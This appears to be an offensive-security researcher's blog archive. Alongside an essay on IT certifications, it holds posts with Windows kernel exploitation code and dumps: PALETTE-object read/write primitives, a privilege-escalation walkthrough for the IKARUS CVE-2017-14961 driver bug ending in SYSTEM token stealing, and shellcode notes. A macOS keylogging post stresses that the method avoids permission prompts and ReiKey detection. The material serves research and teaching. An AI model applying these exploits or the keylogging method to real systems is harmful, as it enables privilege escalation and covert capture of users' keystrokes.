Saturday, February 16, 2019

macOS - keylogging through HID device interface

Just for fun I started to dig into how could I write a piece of software to detect rubber ducky style attacks on macOS. While I was reading through the IOKit API, and digging into the various functions and how everything works, I came across an API call, called IOHIDManagerRegisterInputValueCallback, which sounded very interesting although wasn’t related to what I was looking for. At first read it sounded that you can monitor USB device input. My first trials with the enumeration showed that the built in keyboard on a MacBook Pro is also connecting through the USB / IOHID interface. That made think if I could log keystrokes via this API call. At this point I got totally distracted from my original goal, but I will get back to that later :) Looking up the function on Apple’s website confirmed my suspicion, it says:

Registers a callback to be used when an input value is issued by any enumerated device.

Nice! Since I’m still a complete n00b to either Swift and Objective-C I tried to lookup on Google if someone wrote a key logger such this, and basically I found a good code here: macos - How to tap/hook keyboard events in OSX and record which keyboard fires each event - Stack Overflow This is very well written and you can use it as is, although it doesn’t resolve scan code to actual keys. The mapping is available in one of the header files: MacOSX-SDKs/IOHIDUsageTables.h at master · phracker/MacOSX-SDKs · GitHub With this I extended the code to use this mapping, and also write output to a file, and it works pretty nicely. I uploaded it here:

Then a googled a bit more, and came across this code, which is very-very nice, and does it way-way better then my:

The benefit of this method over the one that uses CGEventTap (common used in malware) is:
  1. you don’t need root privileges
  2. runs even on Mojave without asking for Accessibility permissions
  3. not (yet??) detected by ReiKey
The CGEventTap method is very deeply covered in Patrick Wardle's excellent videos
Patrick Wardle - YouTube
and the code is available in his GitHub repo
GitHub - objective-see/sniffMK: sniff mouse and keyboard events

Tuesday, December 18, 2018

My view and experience with IT certifications


I run into plenty of debates about whether IT certifications are good or bad, what are those people who hold those capable of, what are the expectations and so on. This post is not just about IT Security certs, but IT in general. Personally I love to do certifications and have plenty of them from various vendors, so I thought I will share my view and experience about the let's call it "certification industry".

People with and w/o certs

Personally I see and know basically two types of people: those who love to do certs or at least want to do a few and those who don't give a sh*t about certification. I want it to make clear: it doesn't reflect their skills or knowledge at all, some of the most skilled people I know have exactly 0 certs and don't really care about, and some of them have plenty or at least a few. I think this really comes down to personal preference. There are also a few people like me, who simply likes to do certifications, they are "certification monkeys" (I heard this term from Jeremy Cioara, who does excellent Cisco CBT videos).
There is another aspect to this. I regularly participate in technical job interviews for the past couple of year, nowadays for IT security people and in the past networking people. There are certain certifications in both roles, that if present will almost always involve that the person will have deep technical knowledge, can answer the questions, and in general make a successful interview, I specifically talk about OSCP, OSCE for IT Sec and CCIE for networks. I don't think it's only because of the actual 'certification' but the soft skills you need to achieve them. Assuming you don't cheat, and I want to believe most people don't, you really have to gain plenty of knowledge and put that into practice, keep persisting trying, learning, put your energy onto it, etc... so you can expect something solid from those people. There are people who claim plenty of experience, and some even after telling me doing webapp pentesting for years, can't even answer a simple question about XSS. Again, this is not everyone, there are super smart people without certs (see above) but the likelihood of having a low performer guy with good certs is smaller.
So as I see, there is this correlation: if you have a certification which is hard to achieve (OSCP, CCIE) you are most likely a capable person, and let's make it clear again: *it doesn't mean that if you don't have a certification you are not capable*.

There is also a phenomena, some people with OSCP, CCIE, etc... you name it, get high-minded. I hate that. Please don't! You are not better or smarter than others because of that. No problems with being proud of it, but it goes wrong if you place yourself above others because of having a badge.


Unfortunately there are also people who achieve plenty of certs with using *just* braindumps (preparation guides), and making an exam every other week. I think this not just make the certs less valuable overall, but morally I simply can't (and no one should) agree with it. Even personally I knew someone who did this, and get his CCSP cert in a month, which means he did an exam every week for 4 weeks. During a job or an interview it will very quickly turn out that someone gained his/her certs with just memorising braindumps.
On the other hand I must admit that with Cisco exams I also used braindumps after studying, but I will write about that in more detail below.

What knowledge to expect from certified people?

I often see comments trying to degrade or dignify certifications, and as I see those come from having a totally wrong expectation toward those people or the certification itself. First thing is that a certification doesn't replace experience. For example, if someone has an OSCP (but no experience), it doesn't mean that he/she is ready to find you 0 days, write kernel exploits, be a neat web app pentester or conduct a full red team operation at a company right away without any experience. On the other I believe that person will have a solid foundation that you can easily build on, and quickly put him into work, without too much training, he/she will do fine on his/her own pretty fast. Same is true for CCIE. Think about these like a university degree. Any of those people are ready to work right away out of education? No way! You need to spend weeks to teach them how to use the systems they will work on, and so on, and even then they will be considered beginners. But they have a solid IT foundation and a type of thinking that you can build on.
What to expect from people who have certification where the exam is a multi choice question? Well, definitely less than from those who passed practical hands-on exams. The personality of that person will play a lot there, but probably their knowledge is above 0. I'm not a big fan of these, although I did personally many of them. I will write about them in more detail below.
In short I think these will provide the person with good foundation, what you can build on. Nothing more, nothing less.

Why to certify?

There is definitely an advantage on the job market, especially with headhunters that if you have the right certs it will make you getting the job easier or at least passing the first round easier. Unfortunately many HR people have no idea what these really mean or involve, they just look for the keywords. I remember 10 years ago my colleague was asked by an IT(!!) headhunter: "Do you have such thing as CCIE?" She had no idea what's that and asked that so casually like every other person should have one. This is true to date, not everywhere, but most places. If you apply for a Cisco job, HR will pass your CV more easily to the technical staff if you have CCNA, CCNP, etc... This is unfortunate but I suppose we have to live with that and educate first round interviewers at the same time.
Beside the above personally I like to do them, because of the following:
  • It's a good challenge, and I like challenges.
  • It enforces me to study the material more in depth, and will make me remember for longer time.
  • I like to collect badges :D

Multiple choice vs practical exam

Obviously practical exams have the most value. I think that's a no brainer. On the other side you have the multi choice questions, and in my experience they can be further split.
1. Cisco style
Cisco is the typical exam, which I believe highly unfair. They put in plenty of such lexical questions, that no one on the Earth will know, or give you options that varies only slightly. For example, they had items like: "What is the colour of the Cisco wireless desktop agent if the connection is bad?" and you can chose from red, orange, yellow, and some other. Seriously why is this important at all, and who remembers this? It won't reflect your actual knowledge. Or the other type is where they give you a command with 4 very little variations, and it's not an every day used command they will give you. Now, typically on Cisco or probably on most enterprise grade network devices you will use tabs and question marks many times, because you can't remember every single command. You will know some, but certainly not all of them, and with such command line help available on the OS there is also no reason to remember them. Honestly this is why I used braindumps, as I believe these are unfair questions, and they are not targeted to properly assess the students' knowledge. Not 100% of the exam is such, but a significant part. In reality I don't know a single person who doesn't use braindumps, because of the previous reasons. I always learned the material and did plenty of practicing and I do feel that I know the stuff I took the exam for and thus I don't feel that I really cheated.
2. SANS style
SANS also uses multi choice question exams, but there is a big difference. One is that you can use the study material, which means that even if you get a lexical question you can look it up, although you need to know where to look for. Second is that typically you don't get such questions, but more of those where you actually need to apply what you have learned. I think this is much better. Typically you can do 2 practice tests before the exam, which will have similar style of questions than the real one, but not the same. I never used braindumps with SANS exams, as if you learn the material there is no need, and I passed all of my exams I took, for first.
3. EC-Council style
Maybe they changed it nowadays, but in the past their exam was a joke. A few lexical questions, and plenty of questions what you could answer with common sense, especially in the CEH/ECSA exam. In short it doesn't really reflect anything.


Probably this is where the certification industry gone mad, and this is the point where you will certainly feel that this is only done to harvest money, and you will quickly get disappointed. Ultimately the general concept behind renewal is to demonstrate that your knowledge is maintained/up-to-date and so on, and this is what none of the renewal methods actually ensure, at least those I know of. Here is why:
Cisco policy: in order to renew any associate/professional level certificate, you need to pass one exam from the same level or above, and you need to do it every 3 years. This effectively means that if I pass *any* professional exam I can renew both my CCNP Routing&Switching and Security certs. Passing let's say a switching exam has nothing to do with the security track, but it's still renewed. Why? It won't guarantee that my Cisco Security knowledge is up-to-date. In fact I have both of those, and while I still feel confident that I have a solid CCNP R&S level of knowledge, that's certainly not true for the Security part, and I can't get rid of that if I renew my other one. This just doesn't feel right. If the renewal doesn't fulfil its purpose why to have a renewal policy at all? Money? Renewing a CCIE is even worse, you need to pass the theory exam every 2 years, despite the fact that probably if you passed it, it's most likely so deeply sinked that you will remember it longer than any professional level material.
SANS policy: collect credits for 4 years, and if you have enough you can pay a fee, and there you go, you renewed your cert. You can collect credits with taking trainings (SANS training worth more than others...), going to conferences, etc... like CISSP. I could renew my malware reverse engineering cert with taking a forensics training. Why? That training is different and didn't really contribute to my reversing skills, certainly doesn't mean that you can still dissect a malware. Although SANS tries to make it look like it is, but if you are honest it doesn't. Again what you see here is that the renewal doesn't prove that your are still good at that topic, they just take your money.
EC-Council: similarly you need to collect credits. Exact same story as with SANS, but instead of paying a one time fee every 4 years, they ask for an annual fee. Why? Just to harvest people's money.
Offensive Security: No renewal. I like that. I think in order to pass the hands-on exam, you have to study the material so much, that it will sink in for a very long time.

I feel that the general concept of renewals is wrong at the core. You don't need to renew your university degree, although universities could easily claim that you forgot the material after a few years. I certainly don't remember the mathematics I learned for 2 years, I never used it, never really liked it, so it just faded away, and I think that will be true for every people.

Vendors still try to push for renewals and I feel it's only about trying to tie you to their trainings, exams, and get your money.


I have many-many thoughts on this topic, and it was pretty hard and long to write this post, and I steel feel that I couldn't phrase everything I wanted. I might be wrong with my view, but currently this is how I see things, and no one has to agree. The most important thought I would like people taking away from this post is the following:
  1. Certificate holders: Please don't be high-minded as what you have got is "just" a foundation and there are huge amount of super smart people without certs. No problem for being proud of it, but on a healthy level.
  2. Non-certificate holders: Please don't degrade certificate holders' achievement as in some cases what they achieved is really notable and not easy, and not everyone can do it.
I have a bit of fear that this post will generate a burst of hate from both sides, and vendors, but:


Windows Driver Signing Enforcement bypass

I uploaded all of the materials and files to my latest DSE bypass workshop, which I held at Defcon, and Hacktivity to my Github page:


Friday, August 31, 2018

About WriteProcessMemory

The contents of this post might be very well known to many people, but for me it was new and honestly, also a bit shocking so I thought I will share it, it might be useful for others as well. I came across this behaviour when I was developing a working POC code for enSilo's new TurningTables technique.

In short WriteProcessMemory will write to PAGE_EXECUTE or PAGE_EXECUTE_READ pages if you have sufficient rights (PROCESS_VM_OPERATION) to change its permissions to PAGE_EXECUTE_READWRITE. I want to highlight in the beginning that this will not bypass any built-in security feature, nor exploit anything, this is just a convenience feature.

First I will cover how it works, and at the end why.

Part 1 - How?

This is how WriteProcessMemory works in the latest Windows (1803):

First it will call NtQueryVirtualMemory to get the properties of the region.

The next step is to check if the page has any of the following protections set: PAGE_NOACCESS(0x1) | PAGE_READONLY(0x2) | PAGE_EXECUTE (0x10) | PAGE_EXECUTE_READ (0x20) 

Looking on the check bitwise:

0xcc = 1100 1100
0x1  = 0000 0001
0x2  = 0000 0010
0x10 = 0001 0000
0x20 = 0010 0000

So if we perform the TEST instruction it will set the ZF flag if one of these settings are present. If not, it will go straight to the NtWriteVirtualMemory call, which means that the page has the WRITE bit set:

If the check indicates one of the protection set above, it will do another one:

This will jump if PAGE_NOACCESS or PAGE_READONLY is set, and we get an access denied as expected:

If not, it will do another two checks:

If the page is an MEM_IMAGE (0x1000000) and if it’s MEM_PRIVATE (0x20000) - if none of them, only then it will go to the same ACCESS_DENIED routine, otherwise it will set a value into EAX. That value is eventually passed in RSI to NtProtectVirtualMemory:

Now, what are those values:
0x20000000 - MEM_LARGE_PAGES (large page support)

This means that the OS will nicely change the page protection for us to writeable, without ever giving an access denied. In case it’s an image it will set it to write-copy, which means that it will create a private copy of the image loaded for the process, so it won’t overwrite shared memory.

After this the same NtWriteVirtualMemory will be called, what is shown above. Finally the page protection will be reverted to the original. Essentially we got write access to an EXECUTABLE only page - obviously only if our process has the permission to apply those changes, so it won't bypass any protection.

On older version of Windows 10, the function is slightly different but the logic is exactly the same:

On Windows 7 or 8 the behaviour also exists but the function logic is different. It will try set the memory to PAGE_EXECUTE_READWRITE or if that fails to PAGE_READWRITE right away:

Then it will check if the old protection was either PAGE_EXECUTE_READWRITE, PAGE_READWRITE or PAGE_WRITECOPY, if yes it will go and restore the original protection (as the memory is writeable) and write to it. If not it will check if it’s PAGE_NOACCESS | PAGE_READONLY. If yes, it will go and return ACCESS_DENIED, otherwise it will call NtWriteVirtualMemory… when the page protection is set to PAGE_EXECUTE_READWRITE/PAGE_READWRITE. Again shortcut to have write access to EXECUTABLE pages.

Here is the write:

The ReactOS code will reflect this behaviour:

Yes, you could also set the page protection yourself, but the OS will nicely do it for you, so one less thing to care about when developing an exploit. In my opinion based on MSDN this should fail however (but maybe I misinterpret it):

PAGE_EXECUTE - 0x10 - Enables execute access to the committed region of pages. An attempt to write to the committed region results in an access violation.
PAGE_EXECUTE_READ - 0x20 - Enables execute or read-only access to the committed region of pages. An attempt to write to the committed region results in an access violation.

What happens if we call NtWriteVirtualMemory directly? Then it fails as expected as the page protection is not modified, for example it will fail with:

0x8000000D - STATUS_PARTIAL_COPY - Because of protection conflicts, not all the requested bytes could be copied.

Part 2 - Why?

I found many mentions here and there that this will work, but essentially I contacted Microsoft for further explanation, and I got it, and I want to thank for them for providing these insights. Basically this is done for debuggers, in case debuggers wants to write to memory, they can simply call this API and no need to care for setting page protection every single time. Here are the details:

Here is what that above site says:

"There are a bunch of functions that allow you to manipulate the address space of other processes, like Write­Process­Memory and Virtual­Alloc­Ex. Of what possible legitimate use could they be? Why would one process need to go digging around inside the address space of another process, unless it was up to no good? These functions exist for debuggers. For example, when you ask the debugger to inspect the memory of the process being debugged, it uses Read­Process­Memory to do it. Similarly, when you ask the debugger to update the value of a variable in your process, it uses Write­Process­Memory to do it. And when you ask the debugger to set a breakpoint, it uses the Virtual­Protect­Ex function to change your code pages from read-execute to read-write-execute so that it can patch an int 3 into your program. If you ask the debugger to break into a process, it can use the Create­Remote­Thread function to inject a thread into the process that immediately calls Debug­Break. (The Debug­Break­Process was subsequently added to make this simpler.) But for general-purpose programming, these functions don't really have much valid use. They tend to be used for nefarious purposes like DLL injection and cheating at video games."

UPDATE 2018.09.02. - The story gets worse

So after writing this comes Alex Ionescu and makes it even worse :D

With that, the post wouldn’t be complete without explaining what Alex Ionescu pointed out, which I think much-much worse then the first part. So while spending the weekend my brain couldn't stop thinking about this, and when the light came I reached out to Alex.

You can use this function to write to kernel pages from user mode. This sounds terrible for first, second and also third, and so on, but you will see that is not that horrible, only a little bit. :) So why this happens:

When you call WriteProcessMemory it will call ntdll!NtWriteVirtualMemory which will eventually call nt!NtWriteVirtualMemory, which in newer Win10 versions will call nt!MiReadWriteVirtualMemory. That is the point where it is checked if you come from user land and can write to the targeted memory, to avoid writing to the kernel. But what is really being checked?

1. It will check if you the API is being called from the kernel or user space (PreviousMode).
2. If you come from user mode, it will perform another check which is verifying the address range you are trying to write to, based on the MmUserProbeAddress variable, which points to the end of the user address space. On x64 machines this is a hardcoded value in the code, so there is no actual variable, as you can see below in IDA.

Here is the related ReactOS code snippet for easier understanding (which reflects older Windows versions, but the idea is the same):

 2820    if (PreviousMode != KernelMode)
 2821     {
 2822         //
 2823         // Validate the read addresses
 2824         //
 2825         if ((((ULONG_PTR)BaseAddress + NumberOfBytesToWrite) < (ULONG_PTR)BaseAddress) ||
 2826             (((ULONG_PTR)Buffer + NumberOfBytesToWrite) < (ULONG_PTR)Buffer) ||
 2827             (((ULONG_PTR)BaseAddress + NumberOfBytesToWrite) > MmUserProbeAddress) ||
 2828             (((ULONG_PTR)Buffer + NumberOfBytesToWrite) > MmUserProbeAddress))
 2829         {

If you pass these checks the write will happen.

For kernel exploit writers the flaw is probably obvious at this point if you think about the classic SMEP bypass:
—> from page 31

Here is the issue in short:
If you can set the U/S (owner) bit to 0 (clear) in a PTE entry, it will mean that the page belongs to the kernel. Normally you don’t have any kernel pages in the user address space but if you manage to mess with the PTE (with a kernel exploit), you can have, and it will be valid - you can make a user page to being a kernel page. If that happens, you can use WriteProcessMemory to write to those pages as the actual PTE flag is not verified, which means that you write kernel pages from user mode.

Obviously this doesn’t happen normally, but still…

Additionally in older systems you could modify (for example with a w-w-w kernel exploit) the MmUserProbeAddress and set it to the end of the kernel address space, and at that point you also bypassed the verification, and you have a very nice R/W access to kernel space. Also: These days you would need to patch the actual code, which is protected by the HVCI, PG, so it’s not really possible unless you exploit the hypervisor.

Overall potentially you can have write access to kernel address space from user mode, but not by default, and not in a straightforward way.

I want to thank again to Alex first for pointing this out, and than talking through this whole stuff with me.

Thursday, December 28, 2017

Convert Write-Where kernel exploits into arbitrary Write-What-Where exploit

This post is a follow up of my previous post: I realised that the technique I used there can be generalised.
  1. Currently it’s known that we can create PALETTE objects in the large session pool, and we can leak their address.
  2. We can allocate two PALETTE objects, one after the other, and even without spraying, they will be close enough (<0x1000000 bytes far) to each other - this came from my testing, and running this many times
  3. If we have a write - where vulnerability (where we can't control what we write), we can use that to modify the size of the PALETTE object by modifying 1 byte in the cEntries field, the only requirement is that we can precisely set the location, and it should be something other than 0. We will target the location marked with ** below:

    0: kd> dd fffff8cc44dc4000
    fffff8cc`44dc4000  fe0809ec ffffffff 00000000 00000000
    fffff8cc`44dc4010  26986580 ffffd687 00000501 **0003de
    fffff8cc`44dc4020  0096f8aa 00000000 00000000 00000000
    fffff8cc`44dc4030  00000000 00000000 00000000 00000000
    fffff8cc`44dc4040  00000000 00000000 00000000 00000000
    fffff8cc`44dc4050  00000000 00000000 00000000 00000000
    fffff8cc`44dc4060  00000002 00000001 00000000 00000000
    fffff8cc`44dc4070  00000000 00000000 44dc4088 fffff8cc

  4. Luckily the 7 bytes before and 8 bytes after that field are not so important, so if we smash them we will not cause a BSOD and we can continue to use the object. Essentially the following fields marked with red (also in the above memdump) in the PALETTE structure won't cause an issue if we overwrite them (anything before or after will cause a BSOD):
  5.  BASEOBJECT64      BaseObject;    // 0x00
     FLONG           flPal;         // 0x18
     ULONG32           cEntries;      // 0x1C
     ULONG32           ulTime;        // 0x20 
     HDC             hdcHead;       // 0x24
     ULONG64        hSelected;     // 0x28, 
  6. With modifying that byte to anything other then 0, we increased the size of our PALETTE to > 4 * 0x1000000, which means that if we have another one nearby (and as we saw at step 2 we can have), we can write to it with out-of-bound writes
  7. We overwrite the pFirstColor pointer of the 2nd PALETTE to point to our original PALETTE’s pFirstColor memory location, thus achieving a classic GDI read / write primitive —> We achieved arbitrary kernel read / write
Again, the practical use of this can be seen here:

This will also work if we have another type of vulnerability where we can decrement / increment a value at a memory location of our choice, we can achieve the same. We locate the byte above (**) as a target for decrementing or incrementing, we achieved the same.


  • The PALETTE itself, it won't work beyond Win10 RS3
  • If the write what we don't control is larger than 0x10 bytes, this can't be used as we overwrite other fields that will cause a BSOD

Friday, December 1, 2017

kex - python kernel exploit library - update #3

Another week passed, another update. Not sure how long I can keep up with this frequency :)

  • all 3 shellcodes (token stealing, update token privileges, update ACL of target process)
    • padded all of them with NOPs, so their length is divisible by 4, this is required if we use PALETTE objects as r/w primitive to write the shellcode somewhere. If the shellcode is not divisible by 4, the last couple of bytes will be missing as we can only write multiplies of 4 with PALETTEs
    • in newer Windows versions the KTHREAD->Process pointer is larger than 0x7f (specifically 0xb8), which means that the assembly code is different
      • for sizes <0x80:
        • "\x48\x8b\x40" + 1 byte value (e.g.: 0x7f)
      • for sizes >=0x80:
        • "\x48\x8b\x80" + 1 byte value (e.g.: 0xb8) + "\x00\x00\x00"
  • all 3 shellcodes are verified now to work
The new additions are based on the following resources:

  • Leaking NT base, HalDispatchTable, PTE base address using PALETTE objects
  • Calculate PTE address for a given virtual address
  • Ability to change a VA to executable
  • An example for the new functions using the HEVD driver as usual
With that you can write a shellcode to kernel space, change the PTE address execution flags, update HalDisPatchTable and trigger shellcode - this is what happens in the added example. All works from low privilege mode, up to Windows 10 RS3 (v1709 / FCU).

Saturday, November 25, 2017

kex - python kernel exploit library - major update #2

I made a larger update to my kex library again. Token stealing is not the only way in kernel exploitation, suggest to read the following:

I essentially implemented additional shellcodes based on Cerudo's BlackHat talk and Martin Schenk's blogpost, there are a few differences to how I implemented them vs how Martin did:

  1. I elevate my own process privileges, not the parent or cmd.exe
  2. I use different offset in KTHREAD to find the EPROCESS structure (nt!_KTHREAD ->  _KAPC_STATE -> EPROCESS), so you will see different values there
  3. I used PALETTEs for data-only pwning and not the tagWND method, this also means that it won't work beyond Win10 RS3
  4. The token overwrite has been extended to also change the Present bit as it is required after Win10 RS3, as described here:!_SEP_TOKEN_PRIVILEGES-Single_Write_EoP_Protect.pdf
  5. I added all offsets from Win7 to Win10 RS3 so the code should work universally across all platforms

I added an example with the HEVD driver to show how all these works. I didn't have a chance to test the actual shellcodes, only the data-only variant, so if any issues, let me know.


Wednesday, November 15, 2017

Turning CVE-2017-14961 (IKARUS anti.virus local kernel exploit) into full arbitrary read / write with PALETTE objects

There are 9 exploitable kernel vulnerabilities discovered in IKARUS anti.virus <2.6.18 discovered by @ParvezGHH. You can read more about them here:

I found the exploit for the above CVE very nice and clean by Parvez, I usually like simplicity. This specific vulnerability provides the ability for an attacker to write 0x11 to an arbitrary location, which is entirely under the control of the attacker. Triggering is extremely simple, we send in an empty input, and 0x11 will be written to the address we provide for the output buffer. Parvez used this to overwrite the TOKEN privileges of the given process to gain SeDebugPriviliges and after that injecting a cmd.exe shell code into winlogon.exe. Nice and clean and works universally. I took the opportunity to write this in python and extend my kex library with some useful functions that perform the TOKEN lookup and code injection.

However I wanted to practice a bit of kernel exploitation techniques and decided to turn this into a full arbitrary read / write. In short I wanted to be able to read / write any kernel memory of my choice with the value I want. I also wanted to keep the exploit universal (Win7 to Win10RS3) and if possible trigger it from low integrity mode. I’m not done with the low integrity part, but if I will have time later I will try to finish it, but all the others went fine.

An universal read / write can be done if we can use the PALETTE read / write primitives, but obviously we can’t directly overwrite the pFirstColor pointer of any palette with the vulnerability. So I went to utilise the idea of out of bounds write, which is commonly used with session pool spraying with GDI objects. Let me explain step-by-step the game plan.
  1. Allocate two palettes at known location
  2. Overwrite the cEntries field of one of the palettes, and thus increasing the size.
  3. Use the enlarged palette to overwrite the pFirstColor offset in the second palette —> we are pretty much done at this point, as we can use the regular read / write primitives
  4. Steal token
The first point is achieved via reserving and freeing Windows, and if they get allocated to the same place, we can predict that if we free it and allocate the palette next, it will be at the same location, this works for large pools, for objects size >= 0x1000 (4kB). This is pretty standard, and easy, already implemented in my kex library. Essentially this is the code snippet to do this:

palette_1_address = alloc_free_windows(0)
palette_1_handle = create_palette_with_size(0x1000)
palette_1_pFirstColor = palette_1_address + pFirstColor_offset

palette_2_address = alloc_free_windows(0)
palette_2_handle = create_palette_with_size(0x1000)
palette_2_pFirstColor = palette_2_address + pFirstColor_offset

The second point is to calculate the address where we want to write 0x11. From this point on, we need to make sure that we use the palettes in the right order, as there is no guarantee that palette1 is placed in a lower memory location than palette2, although likely. In this writeup let’s assume that palette1 comes before palette2. So the location is:

palette_1_address + cEntries + 3

cEntries is always 0x1c, and the number of entries is stored on 4 bytes (32 bits). The +3 is needed in order to overwrite the high order byte. If we look on a dump, this is what we will get after the overwrite:

0: kd> dd ffffe5b784730000
ffffe5b7`84730000  9c080a13 ffffffff 00000000 00000000
ffffe5b7`84730010  5fe03700 ffffad0d 00000501 110003de
ffffe5b7`84730020  0006e3f4 00000000 00000000 00000000
ffffe5b7`84730030  00000000 00000000 00000000 00000000
ffffe5b7`84730040  00000000 00000000 00000000 00000000
ffffe5b7`84730050  00000000 00000000 00000000 00000000
ffffe5b7`84730060  00000002 00000001 00000000 00000000
ffffe5b7`84730070  00000000 00000000 84730088 ffffe5b7

This effectively increases the size of the palette to 0x110003de * 4 (from 0x000003de * 4) as one palette entry takes 4 bytes. This should be sufficient to get an overlap with palette2.

As for code:
outputbuffer = palette_1_address + 0x1c + 3

The third step is to overwrite the other palette’s pFirstColor pointer and point it to palette1’s pFirstColor memory address. The last part is easy, we just add the proper offset to palette1’s address, which is 0x78 or 0x80 depending on the platform (as of this writing). How do we overwrite palette2’s pFirstColor pointer? We need to calculate the distance of it beginning from palette1’s first entry. The calculation is:

distance = (palette_2_address + pFirstColor_offset) - (palette_1_address + apalColors_offset)

In words: we take the memory location of the target (palette2address + pFirstColoroffset) and subtract the memory location of the very first entry of palette1 (palette_1address + apalColorsoffset). apalColorsoffset is 0x10 after pFirstColor on x64. We divide this distance by 4 (remember, with palettes we write one entry which is 4 bytes) and get the right index (iStart) to use with the SetPalette function. Code:

address = c_ulonglong(palette_1_pFirstColor)
gdi32.SetPaletteEntries(palette_1_handle, distance/4, sizeof(address)/4, addressof(address));
manager_palette_handle = palette_2_handle
worker_palette_handle = palette_1_handle

At this stage I run into a problem where my code started to overwrite random memory locations, regardless of what the distance is (at least this is how it looked). I was pretty sure I’m right, and I had no idea for hours what goes wrong here. Finally found it. SetPaletteEntries expects an unsigned INT for the iStart index. I didn’t converted the distance to UINT, and it was passed as a signed INT, and as it was quite large, it pointed to another place I expected. This was a good learning for later, I need to watch out for correct ctypes conversion. So the above line correctly is:

gdi32.SetPaletteEntries(palette_1_handle, c_uint(distance/4), sizeof(address)/4, addressof(address));

Once this is done, the only thing remained is to perform token stealing with palettes. Up until this point the entire exploit runs from low integrity mode as well. The token stealing won’t because of the way it’s implemented, but I will look for something else later on.

tokenstealing_with_palettes(manager_palette_handle, worker_palette_handle)

I think the above idea can be easily generalised for similar cases, when we can control the memory location of the overwrite, but not the content. If we can increase the size of a palette, we can gain full read / write.

If you want to play with this, the following happens to be an IKARUS 2.6.15 installer, which is vulnerable:

The above exploit is uploaded here:
It doesn't always work for first, but run it a few times, and eventually you will get SYSTEM.

UPDATE 2017.11.25.:

With the new release of kex, this exploit can work entirely from low integrity mode.

Tuesday, October 31, 2017

Abusing GDI objects for kernel exploitation - PALETTE and various offsets

I started to dig into the topic of abusing GDI objects for Windows kernel exploitation about two weeks ago, and finally get to the PALETTEs. There are many documentation about BITMAPs so I don’t really want to write about those, but there has been little write-ups about PALETTEs. There are three that I relied on during my research:

I decided to implement PALETTE read-write primitives for my kex Python library, and this post is about how did I do that. Basically we need the following info:
  1. What is their size and offset?
  2. How to create them?
  3. How to read / write with them?
Every document I read showed the following structure outline:

typedef struct _PALETTE64
    BASEOBJECT64      BaseObject;    // 0x00
    FLONG           flPal;         // 0x18
    ULONG32           cEntries;      // 0x1C
    ULONG32           ulTime;        // 0x20 
    HDC             hdcHead;       // 0x24
    ULONG64        hSelected;     // 0x28, 
    ULONG64           cRefhpal;      // 0x30
    ULONG64          cRefRegular;   // 0x34
    ULONG64      ptransFore;    // 0x3c
    ULONG64      ptransCurrent; // 0x44
    ULONG64      ptransOld;     // 0x4C
    ULONG32           unk_038;       // 0x38
    ULONG64         pfnGetNearest; // 0x3c
    ULONG64   pfnGetMatch;   // 0x40
    ULONG64           ulRGBTime;     // 0x44
    ULONG64       pRGBXlate;     // 0x48
    PALETTEENTRY    *pFirstColor;  // 0x80
    struct _PALETTE *ppalThis;     // 0x88
    PALETTEENTRY    apalColors[3]; // 0x90

What is important from this is the full size of the structure, which is 0x90 (that is the offset to the PALETTEENTRY array) and the offset to pFirstColor, which points to the array, and this is the pointer that will need to be overwritten to get the read / write primitives. This is at offset 0x80 at every documentation I saw so far, and what you can read everywhere is that this technique works up to Windows10 v1709 (RS3) - and maybe even later, but we don’t know that yet.

The size of the entire object without the POOL_HEADER is basically this PALETTE64 structure + the PALETTEENTRY array. One PALETTEENTRY is 4 bytes as we can see (this will be important later):

class PALETTEENTRY(Structure):
 _fields_ = [
  ("peRed", BYTE),
  ("peGreen", BYTE),
  ("peBlue", BYTE),
  ("peFlags", BYTE)

There is a nice implementation made by Sebastian Apelt from Siberas (see the link above), which I also used as my base in my Python implementation. To create a PALETTE, there is a simple API call:

HPALETTE CreatePalette(
  _In_ const LOGPALETTE *lplgpl

where LOGPALETTE looks like this:

class LOGPALETTE(Structure):
 _fields_ = [
  ("palVersion", WORD),
  ("palNumEntries", WORD),

So essentially to create a PALETTE, we need to calculate the size, populate the structure, and call the API, somehow like this:

pal_cnt = (size - palette_entries_offset) / 4
lPalette = LOGPALETTE()
lPalette.palNumEntries = pal_cnt
lPalette.palVersion = 0x300
palette_handle = gdi32.CreatePalette(byref(lPalette))

As the PALETTEENTRY is 4 bytes, we need to calculate the proper number of entries required for us to reserve the proper size.

Once we have this, we can start read / write, once we overwritten the manager’s palette pFirstColor pointer. To perform these actions we can use the following functions.

UINT GetPaletteEntries(
  _In_  HPALETTE       hpal,
  _In_  UINT           iStartIndex,
  _In_  UINT           nEntries,

UINT SetPaletteEntries(
  _In_       HPALETTE     hpal,
  _In_       UINT         iStart,
  _In_       UINT         cEntries,
  _In_ const PALETTEENTRY *lppe

These can be used just as we used GetBitmapBits / SetBitmapBits. There is an important difference, here we tell the function to read X number of PALETTEENTRYs, which is 4 bytes long. This means that if we want to read 8 bytes (an address in x64), we need to provide the value 2 - dividing the size by 4. That’s it, after that it’s essentially the same. Here is my Python implementation:

def set_address_palette(manager_platte_handle, address):
 address = c_ulonglong(address)
 gdi32.SetPaletteEntries(manager_platte_handle, 0, sizeof(address)/4, addressof(address));
def write_memory_palette(manager_platte_handle, worker_platte_handle, dst, src, len):
 set_address_palette(manager_platte_handle, dst)
 gdi32.SetPaletteEntries(worker_platte_handle, 0, len/4, src)

def read_memory_palette(manager_platte_handle, worker_platte_handle, src, dst, len):
 set_address_palette(manager_platte_handle, src)
 gdi32.GetPaletteEntries(worker_platte_handle, 0, len/4, dst)

and basically that’s it, essentially this will work the same as BITMAPs. You can leak the kernel address of the object with Window objects just as we did with BITMAPs on Win10 v1703 (or earlier). This leak will also work on Win10 v1709.

Wish everything was so simple!

So I started to test this on Win10 v1511, and it worked for first! Nice! I was happy :) It took some time to build a Win10 v1709, so I went ahead and run the same exploit on Win10 v1607, and…. BSOD!! I run it again, and got BSOD again with POOL corruption. So I started to dig into what goes on as I was pretty sure I’m overwriting something wrong. Notice the problem?

0: kd> dc ffff89c9c4611000
ffff89c9`c4611000  7e08083b 00000000 00000000 00000000  ;..~............
ffff89c9`c4611010  d9c0a080 ffff910b 00000501 000003de  ................
ffff89c9`c4611020  00003868 00000000 00000000 00000000  h8..............
ffff89c9`c4611030  00000000 00000000 00000000 00000000  ................
ffff89c9`c4611040  00000000 00000000 00000000 00000000  ................
ffff89c9`c4611050  00000000 00000000 00000000 00000000  ................
ffff89c9`c4611060  00000002 00000001 00000000 00000000  ................
ffff89c9`c4611070  00000000 00000000 c4611088 ffff89c9  ..........a.....
ffff89c9`c4611080  c4611000 ffff89c9 00000000 00000000  ................

0: kd> !pool ffff89c9c4611000
Pool page ffff89c9c4611000 region is Unknown
